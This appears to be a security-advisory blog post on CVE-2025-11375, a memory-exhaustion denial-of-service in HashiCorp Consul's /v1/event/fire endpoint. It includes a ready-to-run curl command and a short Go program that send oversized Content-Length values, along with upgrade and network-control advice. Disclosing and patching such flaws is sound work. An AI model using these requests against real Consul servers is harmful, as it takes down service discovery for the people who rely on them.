Consul, Denial of Service, CVE-2025-11375 (Moderate)

By /

Listen to this Post

The CVE-2025-11375 vulnerability in HashiCorp Consul stems from the `/v1/event/fire` API endpoint’s failure to enforce a maximum value for the HTTP `Content-Length` request header. This omission allows an unauthenticated or authenticated attacker to craft and send a malicious HTTP POST request with an exceptionally large, artificially inflated `Content-Length` value. When Consul processes this request, it allocates server-side memory buffers based on this declared size in anticipation of receiving that volume of data. However, the attacker’s connection remains open, transmitting data extremely slowly or not at all, keeping these substantial memory allocations locked for an extended period. By sending multiple such requests concurrently, the attacker can exhaust the available memory on the Consul server node. This resource exhaustion leads to a denial-of-service condition, rendering the Consul service unresponsive and unable to handle legitimate requests from other services in the infrastructure, thereby disrupting service discovery and orchestration.
Platform: Consul
Version: <1.22.0
Vulnerability: DoS
Severity: Moderate
date: 2025-10-28

Prediction: 2025-11-04

What Undercode Say:

curl -X POST -H "Content-Length: 999999999999" http://consul-server:8500/v1/event/fire -d '{"name":"dos"}'

// Example of a slowloris-style attack on the event endpoint
package main
import (
"net/http"
"time"
)
func main() {
client := &http.Client{}
req, _ := http.NewRequest("POST", "http://localhost:8500/v1/event/fire", nil)
req.ContentLength = 1 << 40 // Specify 1 TiB content length
client.Do(req)
}

How Exploit:

Craft malicious HTTP POST requests with an artificially large `Content-Length` header value and send them to the `/v1/event/fire` endpoint. Multiple concurrent requests exhaust server memory.

Protection from this CVE:

Upgrade Consul to versions 1.22.0, 1.21.6, 1.20.8, or 1.18.12. Implement network controls to restrict access to the Consul API.

Impact:

Service unavailability, resource exhaustion, disruption of service discovery and mesh networking.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top